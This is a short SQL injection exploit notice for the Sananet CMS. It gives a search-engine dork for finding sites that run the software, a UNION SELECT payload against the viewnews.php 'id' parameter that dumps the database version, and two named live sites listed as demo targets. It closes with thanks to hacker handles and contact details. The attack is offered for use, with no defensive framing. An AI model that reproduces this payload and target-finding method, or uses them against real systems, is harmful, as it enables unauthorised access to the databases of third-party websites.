# Exploit Title: sananet cms sql injection # Google Dork:intext :طراحي و راه اندازي از طراحان سنا نت & inurl:viewnews.php?id= # Date: 02/19/2018 # Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin # Vendor Homepage : http://www.sana-net.ir/ # Version: -Final Version # Tested on: kali,win ======================================== Exmaple : http://Site.com/viewnews.php?id=-120+union+all+select+1,@@version,3,4,5,6-- ========================================================= [+] Demo : tabalandegi.ir/ViewNews.php?ID=1 [+] Demo : http://www.2ss2.ir/viewnews.php?id=27 ============================================================= [+] TNX to ======> @dgtaIboy | @Deruw | @servering | Ehsan KOoRN | @AhmadBlocker | @NimaProgrammer01 | @Sir_Developer [+] @Perilous_ManR | @DLuxC4 | @FreeHK | @UniCracker | @BacheGorbeh | @khal0o | @SoheilMV_1996 | @SiR_Li0SioN | @Mahdigh_7 [+] @im_krypton | @Aliwin1 | @midnightcracker ] @Joonbesh | @typing1 [+] EMail : NikbinHK@yahoo.com | T.me/NullixTM